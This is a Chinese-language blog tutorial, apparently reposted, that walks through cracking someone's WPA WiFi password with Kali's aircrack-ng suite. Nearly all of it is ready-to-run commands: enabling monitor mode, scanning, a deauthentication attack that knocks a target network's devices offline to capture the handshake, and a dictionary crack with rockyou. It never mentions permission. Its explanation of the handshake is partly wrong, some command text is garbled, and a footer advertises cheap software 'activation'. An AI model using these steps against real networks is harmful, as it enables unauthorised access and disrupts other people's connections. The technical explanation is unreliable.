大家好,又见面了,我是你们的朋友全栈君。
前期 需要将kali安装好,并且有无线网卡(注意kali支持芯片为3070和1887L的网卡)
-
打开kali,打开终端,使用命令ifconfig查看网卡信息,若有wlan0表示网卡连接成功
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200530193911516.png -
开启网卡监听模式 airmon-ng start wlan0
-
iwconfig, 网卡名为wlan0mon,说明开启成功
-
airodump-ng wlan0mon 扫描WiFi,按ctrl+c结束任务
BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码
-
airodump-ng wlan0mon–bssid BSSID -c 信道频率 -w /抓包存储的路径/包名
-
新打开一个终端输入 aireplay-ng -0 20 -a 目标机地址-c 连接目标机的地址 网卡名
当出现WPA handshake时,表示抓包成功
WiFi设备无限次数,-0 8则攻击8次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,数据包里面的密码是哈希加密的,哈希加密只能正向)
终端可以按ctrl+C停止任务
7.抓到包后,就可以停止监听了,
命令 airmon-ng stop wlan0mon
8.解压自带的密码包,命令如下
gzip -d /usr/share/wordlists/rockyou.txt.gz
9.破解,使用命令
aircrack-ng -w 字典路径 握手包路径
(注意,两路径之间有空格)
例如:
aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/桌面/包名
10.若找不到文件,可按下方找找
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/129184.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...